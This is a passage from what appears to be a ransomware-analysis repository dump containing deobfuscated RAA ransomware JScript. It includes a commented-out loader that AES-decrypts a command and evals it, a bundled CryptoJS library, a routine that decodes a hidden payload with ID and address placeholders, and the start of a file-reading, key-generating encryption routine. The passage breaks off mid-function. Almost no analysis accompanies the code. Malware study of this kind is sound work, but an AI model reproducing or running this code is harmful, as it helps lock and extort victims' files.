DiloQNMSIOPbNMSIOPNMSIOPKNMSIOPM6pEwNMSIOPNMSIOPwqDCoMOpNMSIOPE0NMSIOPbwByNMSIOPGUNMSIOPINMSIOPBpNMSIOPG4NMSIOPZgBvNMSIOPHINMSIOPbQBhNMSIOPHQNMSIOPaQBvNMSIOPG4NMSIOPINMSIOPBvNMSIOPG4NMSIOPINMSIOPBrNMSIOPGUNMSIOPeQBmNMSIOPGkNMSIOPbNMSIOPBlNMSIOPHMNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPDw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJ5ZXMiPz4gCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4gCjxhc3NlbWJseUlkZW50aXR5ICNMSIOPKdmVyc2lvbj0iMS4wLjNMSIOPuMCIgCnByb2Nlc3NvckFyY2hpdGVjdHVyZT0iWDg2IiNMSIOPKbmFtZT0iTmV0b3BzeXN0ZW1zLm5vc3NvIiNMSIOPgCnR5cGU9IndpbjMyIiNMSIOPKLz4gCiNMSIOPKPGRlcGVuZGVuY3k+INMSIOPo8ZGVwZW5kZW50QXNzZW1ibHk+INMSIOPo8YXNzZW1ibHlJZGVudGl0eSNMSIOPKdHlwZT0id2luMzIiINMSIOPpuYW1lPSJNaWNyb3NvZnQuV2luZG93cy5Db21tb24tQ29udHJvbHMiINMSIOPp2ZXJzaW9uPSI2LjNMSIOPuMC4wIiNMSIOPKcHVibGljS2V5VG9rZW49IjY1OTViNjQxNDRjY2YxZGYiINMSIOPpsYW5ndWFnZT0iKiIgCnByb2Nlc3NvckFyY2hpdGVjdHVyZT0iWDg2IiNMSIOPKLz4gCjwvZGVwZW5kZW50QXNzZW1ibHk+INMSIOPo8L2RlcGVuZGVuY3k+INMSIOPo8dHJ1c3RJbmZvIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+INMSIOPo8c2VjdXJpdHk+INMSIOPo8cmVxdWVzdGVkUHJpdmlsZWdlcz4gCjxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCNMSIOPKINMSIOPogCiNMSIOPKbGV2ZWw9ImFzSW52b2tlciIgCnVpQWNjZXNzPSJmYWxzZSIgCi8+INMSIOPo8L3JlcXVlc3RlZFByaXZpbGVnZXM+INMSIOPo8L3NlY3VyaXR5PiNMSIOPKPC90cnVzdEluZm8+INMSIOPo8L2Fzc2VtYmx5PlBBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURE\";\n//\n//     var cmd = \"U2FsdGVkX1/LHQl+aIAo/hXHDEI5YmZZtBIcL5LHq7o+NZyTxtiLAxCsucmN0NBq12nnNJ7XOCyeXqF9xLAkahyIcXx5oc/ic5FRpoj+tZ1qywTZNhPWMlRllGn8O8viVnpXMYHoJr/AphGHfaAOkX8xYjuWhZE8qw1Qw1vQbqdbMlv5RL3xTETBgbylCgyGER91Kef4Q/2YtokOqzg+0BZIjKpdIbr1jQdh8uwp9MKd+Y9dSm1Lz9dl82QJVVbFiBj7N6MEDCw5JESVi5HilHWFEb3eyacdJBxYtKutbAZBOl6aJrLyxKtlxm4o9Cie5+vIPgMtqHEmBWp9GaqYDQlxXXOuTeysry1LXQiCGP7msk2hqAOEhyfxchlAQuma4twTFqHOrPZDECk8hfVJkBvUZg/hl+y4gKbBBLVDEIlKW9AstpcAP6FOcTt/bsS+0fvHnl1fAtMB1AsBSHKhZX/6eMPBGQBQT5fqvyy8MLyMgLOsCt5XHyEgc2ecU1fDokpzzMxMqIPwFZoQDOZSg/pBOMVTyUHuv18WdWI+Q6lppzIUv4mvxEioH7SROiDFqJoHR4EwIdDO0QR82Q4RTTIWO9CfXkC5VnXlEncsU45rIzfEMDv4r1aqoYQlgFr6xjas0/e7+EVCoxhsp4C2Jta43NmC6uLnhjcWRdCcB/8=\";\n//     var key_cmd = \"2c025c0a1a45d1f18df9ca3514babdbc\";\n//     var dec_cmd = CryptoJS.AES.decrypt(cmd, key_cmd);\n//     dec_cmd = CryptoJS.enc.Utf8.stringify(dec_cmd);\n//     eval(dec_cmd);\n//     return 0;\n// }\n\nvar CryptoJS = CryptoJS || function (u, p) {\n        var d = {}, l = d.lib = {}, s = function () {\n            }, t = l.Base = {\n                extend: function (a) {\n                    s.prototype = this;\n                    var c = new s;\n                    a && c.mixIn(a);\n                    c.hasOwnProperty(\"init\") || (c.init = function () {\n                        c.$super.init.apply(this, arguments)\n                    });\n                    c.init.prototype = c;\n                    c.$super = this;\n                    return c\n                }, create: function () {\n                    var a = this.extend();\n                    a.init.apply(a, arguments);\n                    return a\n                }, init: function () {\n                }, mixIn: function (a) {\n                    for (var c in a)a.hasOwnProperty(c) && (this[c] = a[c]);\n                    a.hasOwnProperty(\"toString\") && (this.toString = a.toString)\n                }, clone: function () {\n                    return this.init.prototype.extend(this)\n                }\n            },\n            r = l.WordArray = t.extend({\n                init: function (a, c) {\n                    a = this.words = a || [];\n                    this.sigBytes = c != p ? c : 4 * a.length\n                }, toString: function (a) {\n                    return (a || v).stringify(this)\n                }, concat: function (a) {\n                    var c = this.words, e = a.words, j = this.sigBytes;\n                    a = a.sigBytes;\n                    this.clamp();\n                    if (j % 4)for (var k = 0; k < a; k++)c[j + k >>> 2] |= (e[k >>> 2] >>> 24 - 8 * (k % 4) & 255) << 24 - 8 * ((j + k) % 4); else if (65535 < e.length)for (k = 0; k < a; k += 4)c[j + k >>> 2] = e[k >>> 2]; else c.push.apply(c, e);\n                    this.sigBytes += a;\n                    return this\n                }, clamp: function () {\n                    var a = this.words, c = this.sigBytes;\n                    a[c >>> 2] &= 4294967295 <<\n                        32 - 8 * (c % 4);\n                    a.length = u.ceil(c / 4)\n                }, clone: function () {\n                    var a = t.clone.call(this);\n                    a.words = this.words.slice(0);\n                    return a\n                }, random: function (a) {\n                    for (var c = [], e = 0; e < a; e += 4)c.push(4294967296 * u.random() | 0);\n                    return new r.init(c, a)\n                }\n            }), w = d.enc = {}, v = w.Hex = {\n                stringify: function (a) {\n                    var c = a.words;\n                    a = a.sigBytes;\n                    for (var e = [], j = 0; j < a; j++) {\n                        var k = c[j >>> 2] >>> 24 - 8 * (j % 4) & 255;\n                        e.push((k >>> 4).toString(16));\n                        e.push((k & 15).toString(16))\n                    }\n                    return e.join(\"\")\n                }, parse: function (a) {\n                    for (var c = a.length, e = [], j = 0; j < c; j += 2)e[j >>> 3] |= parseInt(a.substr(j,\n                            2), 16) << 24 - 4 * (j % 8);\n                    return new r.init(e, c / 2)\n                }\n            }, b = w.Latin1 = {\n                stringify: function (a) {\n                    var c = a.words;\n                    a = a.sigBytes;\n                    for (var e = [], j = 0; j < a; j++)e.push(String.fromCharCode(c[j >>> 2] >>> 24 - 8 * (j % 4) & 255));\n                    return e.join(\"\")\n                }, parse: function (a) {\n                    for (var c = a.length, e = [], j = 0; j < c; j++)e[j >>> 2] |= (a.charCodeAt(j) & 255) << 24 - 8 * (j % 4);\n                    return new r.init(e, c)\n                }\n            }, x = w.Utf8 = {\n                stringify: function (a) {\n                    try {\n                        return decodeURIComponent(escape(b.stringify(a)))\n                    } catch (c) {\n                        throw Error(\"Malformed UTF-8 data\");\n                    }\n                }, parse: function (a) {\n                    return b.parse(unescape(encodeURIComponent(a)))\n                }\n            },\n            q = l.BufferedBlockAlgorithm = t.extend({\n                reset: function () {\n                    this._data = new r.init;\n                    this._nDataBytes = 0\n                }, _append: function (a) {\n                    \"string\" == typeof a && (a = x.parse(a));\n                    this._data.concat(a);\n                    this._nDataBytes += a.sigBytes\n                }, _process: function (a) {\n                    var c = this._data, e = c.words, j = c.sigBytes, k = this.blockSize, b = j / (4 * k), b = a ? u.ceil(b) : u.max((b | 0) - this._minBufferSize, 0);\n                    a = b * k;\n                    j = u.min(4 * a, j);\n                    if (a) {\n                        for (var q = 0; q < a; q += k)this._doProcessBlock(e, q);\n                        q = e.splice(0, a);\n                        c.sigBytes -= j\n                    }\n                    return new r.init(q, j)\n                }, clone: function () {\n                    var a = t.clone.call(this);\n                    a._data = this._data.clone();\n                    return a\n                }, _minBufferSize: 0\n            });\n        l.Hasher = q.extend({\n            cfg: t.extend(), init: function (a) {\n                this.cfg = this.cfg.extend(a);\n                this.reset()\n            }, reset: function () {\n                q.reset.call(this);\n                this._doReset()\n            }, update: function (a) {\n                this._append(a);\n                this._process();\n                return this\n            }, finalize: function (a) {\n                a && this._append(a);\n                return this._doFinalize()\n            }, blockSize: 16, _createHelper: function (a) {\n                return function (b, e) {\n                    return (new a.init(e)).finalize(b)\n                }\n            }, _createHmacHelper: function (a) {\n                return function (b, e) {\n                    return (new n.HMAC.init(a,\n                        e)).finalize(b)\n                }\n            }\n        });\n        var n = d.algo = {};\n        return d\n    }(Math);\n(function () {\n    var u = CryptoJS, p = u.lib.WordArray;\n    u.enc.Base64 = {\n        stringify: function (d) {\n            var l = d.words, p = d.sigBytes, t = this._map;\n            d.clamp();\n            d = [];\n            for (var r = 0; r < p; r += 3)for (var w = (l[r >>> 2] >>> 24 - 8 * (r % 4) & 255) << 16 | (l[r + 1 >>> 2] >>> 24 - 8 * ((r + 1) % 4) & 255) << 8 | l[r + 2 >>> 2] >>> 24 - 8 * ((r + 2) % 4) & 255, v = 0; 4 > v && r + 0.75 * v < p; v++)d.push(t.charAt(w >>> 6 * (3 - v) & 63));\n            if (l = t.charAt(64))for (; d.length % 4;)d.push(l);\n            return d.join(\"\")\n        },\n        parse: function (d) {\n            var l = d.length, s = this._map, t = s.charAt(64);\n            t && (t = d.indexOf(t), -1 != t && (l = t));\n            for (var t = [], r = 0, w = 0; w <\n            l; w++)if (w % 4) {\n                var v = s.indexOf(d.charAt(w - 1)) << 2 * (w % 4), b = s.indexOf(d.charAt(w)) >>> 6 - 2 * (w % 4);\n                t[r >>> 2] |= (v | b) << 24 - 8 * (r % 4);\n                r++\n            }\n            return p.create(t, r)\n        },\n        _map: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\n    }\n})();\n(function (u) {\n    function p(b, n, a, c, e, j, k) {\n        b = b + (n & a | ~n & c) + e + k;\n        return (b << j | b >>> 32 - j) + n\n    }\n\n    function d(b, n, a, c, e, j, k) {\n        b = b + (n & c | a & ~c) + e + k;\n        return (b << j | b >>> 32 - j) + n\n    }\n\n    function l(b, n, a, c, e, j, k) {\n        b = b + (n ^ a ^ c) + e + k;\n        return (b << j | b >>> 32 - j) + n\n    }\n\n    function s(b, n, a, c, e, j, k) {\n        b = b + (a ^ (n | ~c)) + e + k;\n        return (b << j | b >>> 32 - j) + n\n    }\n\n    for (var t = CryptoJS, r = t.lib, w = r.WordArray, v = r.Hasher, r = t.algo, b = [], x = 0; 64 > x; x++)b[x] = 4294967296 * u.abs(u.sin(x + 1)) | 0;\n    r = r.MD5 = v.extend({\n        _doReset: function () {\n            this._hash = new w.init([1732584193, 4023233417, 2562383102, 271733878])\n        },\n        _doProcessBlock: function (q, n) {\n            for (var a = 0; 16 > a; a++) {\n                var c = n + a, e = q[c];\n                q[c] = (e << 8 | e >>> 24) & 16711935 | (e << 24 | e >>> 8) & 4278255360\n            }\n            var a = this._hash.words, c = q[n + 0], e = q[n + 1], j = q[n + 2], k = q[n + 3], z = q[n + 4], r = q[n + 5], t = q[n + 6], w = q[n + 7], v = q[n + 8], A = q[n + 9], B = q[n + 10], C = q[n + 11], u = q[n + 12], D = q[n + 13], E = q[n + 14], x = q[n + 15], f = a[0], m = a[1], g = a[2], h = a[3], f = p(f, m, g, h, c, 7, b[0]), h = p(h, f, m, g, e, 12, b[1]), g = p(g, h, f, m, j, 17, b[2]), m = p(m, g, h, f, k, 22, b[3]), f = p(f, m, g, h, z, 7, b[4]), h = p(h, f, m, g, r, 12, b[5]), g = p(g, h, f, m, t, 17, b[6]), m = p(m, g, h, f, w, 22, b[7]),\n                f = p(f, m, g, h, v, 7, b[8]), h = p(h, f, m, g, A, 12, b[9]), g = p(g, h, f, m, B, 17, b[10]), m = p(m, g, h, f, C, 22, b[11]), f = p(f, m, g, h, u, 7, b[12]), h = p(h, f, m, g, D, 12, b[13]), g = p(g, h, f, m, E, 17, b[14]), m = p(m, g, h, f, x, 22, b[15]), f = d(f, m, g, h, e, 5, b[16]), h = d(h, f, m, g, t, 9, b[17]), g = d(g, h, f, m, C, 14, b[18]), m = d(m, g, h, f, c, 20, b[19]), f = d(f, m, g, h, r, 5, b[20]), h = d(h, f, m, g, B, 9, b[21]), g = d(g, h, f, m, x, 14, b[22]), m = d(m, g, h, f, z, 20, b[23]), f = d(f, m, g, h, A, 5, b[24]), h = d(h, f, m, g, E, 9, b[25]), g = d(g, h, f, m, k, 14, b[26]), m = d(m, g, h, f, v, 20, b[27]), f = d(f, m, g, h, D, 5, b[28]), h = d(h, f,\n                m, g, j, 9, b[29]), g = d(g, h, f, m, w, 14, b[30]), m = d(m, g, h, f, u, 20, b[31]), f = l(f, m, g, h, r, 4, b[32]), h = l(h, f, m, g, v, 11, b[33]), g = l(g, h, f, m, C, 16, b[34]), m = l(m, g, h, f, E, 23, b[35]), f = l(f, m, g, h, e, 4, b[36]), h = l(h, f, m, g, z, 11, b[37]), g = l(g, h, f, m, w, 16, b[38]), m = l(m, g, h, f, B, 23, b[39]), f = l(f, m, g, h, D, 4, b[40]), h = l(h, f, m, g, c, 11, b[41]), g = l(g, h, f, m, k, 16, b[42]), m = l(m, g, h, f, t, 23, b[43]), f = l(f, m, g, h, A, 4, b[44]), h = l(h, f, m, g, u, 11, b[45]), g = l(g, h, f, m, x, 16, b[46]), m = l(m, g, h, f, j, 23, b[47]), f = s(f, m, g, h, c, 6, b[48]), h = s(h, f, m, g, w, 10, b[49]), g = s(g, h, f, m,\n                E, 15, b[50]), m = s(m, g, h, f, r, 21, b[51]), f = s(f, m, g, h, u, 6, b[52]), h = s(h, f, m, g, k, 10, b[53]), g = s(g, h, f, m, B, 15, b[54]), m = s(m, g, h, f, e, 21, b[55]), f = s(f, m, g, h, v, 6, b[56]), h = s(h, f, m, g, x, 10, b[57]), g = s(g, h, f, m, t, 15, b[58]), m = s(m, g, h, f, D, 21, b[59]), f = s(f, m, g, h, z, 6, b[60]), h = s(h, f, m, g, C, 10, b[61]), g = s(g, h, f, m, j, 15, b[62]), m = s(m, g, h, f, A, 21, b[63]);\n            a[0] = a[0] + f | 0;\n            a[1] = a[1] + m | 0;\n            a[2] = a[2] + g | 0;\n            a[3] = a[3] + h | 0\n        }, _doFinalize: function () {\n            var b = this._data, n = b.words, a = 8 * this._nDataBytes, c = 8 * b.sigBytes;\n            n[c >>> 5] |= 128 << 24 - c % 32;\n            var e = u.floor(a /\n                4294967296);\n            n[(c + 64 >>> 9 << 4) + 15] = (e << 8 | e >>> 24) & 16711935 | (e << 24 | e >>> 8) & 4278255360;\n            n[(c + 64 >>> 9 << 4) + 14] = (a << 8 | a >>> 24) & 16711935 | (a << 24 | a >>> 8) & 4278255360;\n            b.sigBytes = 4 * (n.length + 1);\n            this._process();\n            b = this._hash;\n            n = b.words;\n            for (a = 0; 4 > a; a++)c = n[a], n[a] = (c << 8 | c >>> 24) & 16711935 | (c << 24 | c >>> 8) & 4278255360;\n            return b\n        }, clone: function () {\n            var b = v.clone.call(this);\n            b._hash = this._hash.clone();\n            return b\n        }\n    });\n    t.MD5 = v._createHelper(r);\n    t.HmacMD5 = v._createHmacHelper(r)\n})(Math);\n(function () {\n    var u = CryptoJS, p = u.lib, d = p.Base, l = p.WordArray, p = u.algo, s = p.EvpKDF = d.extend({\n        cfg: d.extend({\n            keySize: 4,\n            hasher: p.MD5,\n            iterations: 1\n        }), init: function (d) {\n            this.cfg = this.cfg.extend(d)\n        }, compute: function (d, r) {\n            for (var p = this.cfg, s = p.hasher.create(), b = l.create(), u = b.words, q = p.keySize, p = p.iterations; u.length < q;) {\n                n && s.update(n);\n                var n = s.update(d).finalize(r);\n                s.reset();\n                for (var a = 1; a < p; a++)n = s.finalize(n), s.reset();\n                b.concat(n)\n            }\n            b.sigBytes = 4 * q;\n            return b\n        }\n    });\n    u.EvpKDF = function (d, l, p) {\n        return s.create(p).compute(d,\n            l)\n    }\n})();\nCryptoJS.lib.Cipher || function (u) {\n    var p = CryptoJS, d = p.lib, l = d.Base, s = d.WordArray, t = d.BufferedBlockAlgorithm, r = p.enc.Base64, w = p.algo.EvpKDF, v = d.Cipher = t.extend({\n        cfg: l.extend(),\n        createEncryptor: function (e, a) {\n            return this.create(this._ENC_XFORM_MODE, e, a)\n        },\n        createDecryptor: function (e, a) {\n            return this.create(this._DEC_XFORM_MODE, e, a)\n        },\n        init: function (e, a, b) {\n            this.cfg = this.cfg.extend(b);\n            this._xformMode = e;\n            this._key = a;\n            this.reset()\n        },\n        reset: function () {\n            t.reset.call(this);\n            this._doReset()\n        },\n        process: function (e) {\n            this._append(e);\n            return this._process()\n        },\n        finalize: function (e) {\n            e && this._append(e);\n            return this._doFinalize()\n        },\n        keySize: 4,\n        ivSize: 4,\n        _ENC_XFORM_MODE: 1,\n        _DEC_XFORM_MODE: 2,\n        _createHelper: function (e) {\n            return {\n                encrypt: function (b, k, d) {\n                    return (\"string\" == typeof k ? c : a).encrypt(e, b, k, d)\n                }, decrypt: function (b, k, d) {\n                    return (\"string\" == typeof k ? c : a).decrypt(e, b, k, d)\n                }\n            }\n        }\n    });\n    d.StreamCipher = v.extend({\n        _doFinalize: function () {\n            return this._process(!0)\n        }, blockSize: 1\n    });\n    var b = p.mode = {}, x = function (e, a, b) {\n        var c = this._iv;\n        c ? this._iv = u : c = this._prevBlock;\n        for (var d = 0; d < b; d++)e[a + d] ^=\n            c[d]\n    }, q = (d.BlockCipherMode = l.extend({\n        createEncryptor: function (e, a) {\n            return this.Encryptor.create(e, a)\n        }, createDecryptor: function (e, a) {\n            return this.Decryptor.create(e, a)\n        }, init: function (e, a) {\n            this._cipher = e;\n            this._iv = a\n        }\n    })).extend();\n    q.Encryptor = q.extend({\n        processBlock: function (e, a) {\n            var b = this._cipher, c = b.blockSize;\n            x.call(this, e, a, c);\n            b.encryptBlock(e, a);\n            this._prevBlock = e.slice(a, a + c)\n        }\n    });\n    q.Decryptor = q.extend({\n        processBlock: function (e, a) {\n            var b = this._cipher, c = b.blockSize, d = e.slice(a, a + c);\n            b.decryptBlock(e, a);\n            x.call(this,\n                e, a, c);\n            this._prevBlock = d\n        }\n    });\n    b = b.CBC = q;\n    q = (p.pad = {}).Pkcs7 = {\n        pad: function (a, b) {\n            for (var c = 4 * b, c = c - a.sigBytes % c, d = c << 24 | c << 16 | c << 8 | c, l = [], n = 0; n < c; n += 4)l.push(d);\n            c = s.create(l, c);\n            a.concat(c)\n        }, unpad: function (a) {\n            a.sigBytes -= a.words[a.sigBytes - 1 >>> 2] & 255\n        }\n    };\n    d.BlockCipher = v.extend({\n        cfg: v.cfg.extend({mode: b, padding: q}), reset: function () {\n            v.reset.call(this);\n            var a = this.cfg, b = a.iv, a = a.mode;\n            if (this._xformMode == this._ENC_XFORM_MODE)var c = a.createEncryptor; else c = a.createDecryptor, this._minBufferSize = 1;\n            this._mode = c.call(a,\n                this, b && b.words)\n        }, _doProcessBlock: function (a, b) {\n            this._mode.processBlock(a, b)\n        }, _doFinalize: function () {\n            var a = this.cfg.padding;\n            if (this._xformMode == this._ENC_XFORM_MODE) {\n                a.pad(this._data, this.blockSize);\n                var b = this._process(!0)\n            } else b = this._process(!0), a.unpad(b);\n            return b\n        }, blockSize: 4\n    });\n    var n = d.CipherParams = l.extend({\n        init: function (a) {\n            this.mixIn(a)\n        }, toString: function (a) {\n            return (a || this.formatter).stringify(this)\n        }\n    }), b = (p.format = {}).OpenSSL = {\n        stringify: function (a) {\n            var b = a.ciphertext;\n            a = a.salt;\n            return (a ? s.create([1398893684,\n                1701076831]).concat(a).concat(b) : b).toString(r)\n        }, parse: function (a) {\n            a = r.parse(a);\n            var b = a.words;\n            if (1398893684 == b[0] && 1701076831 == b[1]) {\n                var c = s.create(b.slice(2, 4));\n                b.splice(0, 4);\n                a.sigBytes -= 16\n            }\n            return n.create({ciphertext: a, salt: c})\n        }\n    }, a = d.SerializableCipher = l.extend({\n        cfg: l.extend({format: b}), encrypt: function (a, b, c, d) {\n            d = this.cfg.extend(d);\n            var l = a.createEncryptor(c, d);\n            b = l.finalize(b);\n            l = l.cfg;\n            return n.create({\n                ciphertext: b,\n                key: c,\n                iv: l.iv,\n                algorithm: a,\n                mode: l.mode,\n                padding: l.padding,\n                blockSize: a.blockSize,\n                formatter: d.format\n            })\n        },\n        decrypt: function (a, b, c, d) {\n            d = this.cfg.extend(d);\n            b = this._parse(b, d.format);\n            return a.createDecryptor(c, d).finalize(b.ciphertext)\n        }, _parse: function (a, b) {\n            return \"string\" == typeof a ? b.parse(a, this) : a\n        }\n    }), p = (p.kdf = {}).OpenSSL = {\n        execute: function (a, b, c, d) {\n            d || (d = s.random(8));\n            a = w.create({keySize: b + c}).compute(a, d);\n            c = s.create(a.words.slice(b), 4 * c);\n            a.sigBytes = 4 * b;\n            return n.create({key: a, iv: c, salt: d})\n        }\n    }, c = d.PasswordBasedCipher = a.extend({\n        cfg: a.cfg.extend({kdf: p}), encrypt: function (b, c, d, l) {\n            l = this.cfg.extend(l);\n            d = l.kdf.execute(d,\n                b.keySize, b.ivSize);\n            l.iv = d.iv;\n            b = a.encrypt.call(this, b, c, d.key, l);\n            b.mixIn(d);\n            return b\n        }, decrypt: function (b, c, d, l) {\n            l = this.cfg.extend(l);\n            c = this._parse(c, l.format);\n            d = l.kdf.execute(d, b.keySize, b.ivSize, c.salt);\n            l.iv = d.iv;\n            return a.decrypt.call(this, b, c, d.key, l)\n        }\n    })\n}();\n(function () {\n    for (var u = CryptoJS, p = u.lib.BlockCipher, d = u.algo, l = [], s = [], t = [], r = [], w = [], v = [], b = [], x = [], q = [], n = [], a = [], c = 0; 256 > c; c++)a[c] = 128 > c ? c << 1 : c << 1 ^ 283;\n    for (var e = 0, j = 0, c = 0; 256 > c; c++) {\n        var k = j ^ j << 1 ^ j << 2 ^ j << 3 ^ j << 4, k = k >>> 8 ^ k & 255 ^ 99;\n        l[e] = k;\n        s[k] = e;\n        var z = a[e], F = a[z], G = a[F], y = 257 * a[k] ^ 16843008 * k;\n        t[e] = y << 24 | y >>> 8;\n        r[e] = y << 16 | y >>> 16;\n        w[e] = y << 8 | y >>> 24;\n        v[e] = y;\n        y = 16843009 * G ^ 65537 * F ^ 257 * z ^ 16843008 * e;\n        b[k] = y << 24 | y >>> 8;\n        x[k] = y << 16 | y >>> 16;\n        q[k] = y << 8 | y >>> 24;\n        n[k] = y;\n        e ? (e = z ^ a[a[a[G ^ z]]], j ^= a[a[j]]) : e = j = 1\n    }\n    var H = [0, 1, 2, 4, 8,\n        16, 32, 64, 128, 27, 54], d = d.AES = p.extend({\n        _doReset: function () {\n            for (var a = this._key, c = a.words, d = a.sigBytes / 4, a = 4 * ((this._nRounds = d + 6) + 1), e = this._keySchedule = [], j = 0; j < a; j++)if (j < d)e[j] = c[j]; else {\n                var k = e[j - 1];\n                j % d ? 6 < d && 4 == j % d && (k = l[k >>> 24] << 24 | l[k >>> 16 & 255] << 16 | l[k >>> 8 & 255] << 8 | l[k & 255]) : (k = k << 8 | k >>> 24, k = l[k >>> 24] << 24 | l[k >>> 16 & 255] << 16 | l[k >>> 8 & 255] << 8 | l[k & 255], k ^= H[j / d | 0] << 24);\n                e[j] = e[j - d] ^ k\n            }\n            c = this._invKeySchedule = [];\n            for (d = 0; d < a; d++)j = a - d, k = d % 4 ? e[j] : e[j - 4], c[d] = 4 > d || 4 >= j ? k : b[l[k >>> 24]] ^ x[l[k >>> 16 & 255]] ^ q[l[k >>>\n            8 & 255]] ^ n[l[k & 255]]\n        }, encryptBlock: function (a, b) {\n            this._doCryptBlock(a, b, this._keySchedule, t, r, w, v, l)\n        }, decryptBlock: function (a, c) {\n            var d = a[c + 1];\n            a[c + 1] = a[c + 3];\n            a[c + 3] = d;\n            this._doCryptBlock(a, c, this._invKeySchedule, b, x, q, n, s);\n            d = a[c + 1];\n            a[c + 1] = a[c + 3];\n            a[c + 3] = d\n        }, _doCryptBlock: function (a, b, c, d, e, j, l, f) {\n            for (var m = this._nRounds, g = a[b] ^ c[0], h = a[b + 1] ^ c[1], k = a[b + 2] ^ c[2], n = a[b + 3] ^ c[3], p = 4, r = 1; r < m; r++)var q = d[g >>> 24] ^ e[h >>> 16 & 255] ^ j[k >>> 8 & 255] ^ l[n & 255] ^ c[p++], s = d[h >>> 24] ^ e[k >>> 16 & 255] ^ j[n >>> 8 & 255] ^ l[g & 255] ^ c[p++], t =\n                d[k >>> 24] ^ e[n >>> 16 & 255] ^ j[g >>> 8 & 255] ^ l[h & 255] ^ c[p++], n = d[n >>> 24] ^ e[g >>> 16 & 255] ^ j[h >>> 8 & 255] ^ l[k & 255] ^ c[p++], g = q, h = s, k = t;\n            q = (f[g >>> 24] << 24 | f[h >>> 16 & 255] << 16 | f[k >>> 8 & 255] << 8 | f[n & 255]) ^ c[p++];\n            s = (f[h >>> 24] << 24 | f[k >>> 16 & 255] << 16 | f[n >>> 8 & 255] << 8 | f[g & 255]) ^ c[p++];\n            t = (f[k >>> 24] << 24 | f[n >>> 16 & 255] << 16 | f[g >>> 8 & 255] << 8 | f[h & 255]) ^ c[p++];\n            n = (f[n >>> 24] << 24 | f[g >>> 16 & 255] << 16 | f[h >>> 8 & 255] << 8 | f[k & 255]) ^ c[p++];\n            a[b] = q;\n            a[b + 1] = s;\n            a[b + 2] = t;\n            a[b + 3] = n\n        }, keySize: 8\n    });\n    u.AES = p._createHelper(d)\n})();\n\n\nfunction VGCDtihB() {\n    var rftKZajp = \"e1xydG(...)QoRAASEP\";\n    var cUNSPAqZAE = rftKZajp.replace(/RAASEP/g, \"A\");\n    cUNSPAqZAE = CryptoJS.enc.Base64.parse(cUNSPAqZAE);\n    cUNSPAqZAE = cUNSPAqZAE.toString(CryptoJS.enc.Utf8);\n    cUNSPAqZAE = cUNSPAqZAE.replace(/=IDHERE=/g, cVjZujcP);\n    cUNSPAqZAE = cUNSPAqZAE.replace(/=ADRHERE=/g, jOnaTnksWb);\n    return cUNSPAqZAE;\n}\n\nconsole.log(VGCDtihB());"
  },
  {
    "path": "raa-ransomware-analysis/work/tmp2.js",
    "content": "/**\n * Created by bl4de on 27.07.2016.\n */\nfunction KWgwJwOlqJcs(IMhTname) {\n\n    function rStinsVp(rand) {\n        var eqQu = [];\n        var EPtLPmand = -1;\n        do {\n            EPtLPmand += 1;\n            eqQu[EPtLPmand] = Math.floor((Math.random() * 2000) + 1);\n            if (eqQu[EPtLPmand] < 10) {\n                eqQu[EPtLPmand] = \"000\" + eqQu[EPtLPmand];\n            } else if (eqQu[EPtLPmand] >= 10 && eqQu[EPtLPmand] < 100) {\n                eqQu[EPtLPmand] = \"00\" + eqQu[EPtLPmand];\n            } else if (eqQu[EPtLPmand] >= 100 && eqQu[EPtLPmand] < 1000) {\n                eqQu[EPtLPmand] = \"0\" + eqQu[EPtLPmand];\n            } else {\n                eqQu[EPtLPmand] = eqQu[EPtLPmand];\n            }\n        } while (eqQu.length < 32);\n        var xjLCtcIO = \"\";\n        var EPtLPmand2 = -1;\n        var vPdyagHuFMMj = [];\n        do {\n            EPtLPmand2 += 1;\n            vPdyagHuFMMj[EPtLPmand2] = parseInt(eqQu[EPtLPmand2]);\n            xjLCtcIO = xjLCtcIO + rand.charAt(vPdyagHuFMMj[EPtLPmand2]);\n        } while (xjLCtcIO.length < 32);\n        var gieJISwveNlD = [];\n        gieJISwveNlD[0] = eqQu;\n        gieJISwveNlD[1] = xjLCtcIO;\n        return gieJISwveNlD;\n    }\n\n    var HZtSmFNRdJM_data = rStinsVp(VKw);\n\n    var qPCIyff = rStinsVp(VKw);\n\n////cWO7h7UOQEdvc9GiXfI7h2j00qzhHNh03qS4qJXfoQyWniUmqpKHaoPNTEYwSY3H2IVazY1nJbmfpKKyj9fNWAwPcrwVPxiE04yYjYwnxP\n    function udpIHxNm(IMhTname) {\n        var SlSPWu = WScript.CreateObject(\"ADODB.Stream\");\n        SlSPWu.CharSet = '437';\n        SlSPWu.Open();\n        SlSPWu.LoadFromFile(IMhTname);\n        var hXpHGpZ = [];\n        hXpHGpZ[0] = [];\n        hXpHGpZ[1] = [];\n        var PRuJZyAvfeza = SlSPWu.Size;\n        if (PRuJZyAvfeza > 6122 && PRuJZyAvfeza < 5000000) {\n            var GinRqOjln = OQlYdejWlC(2000, 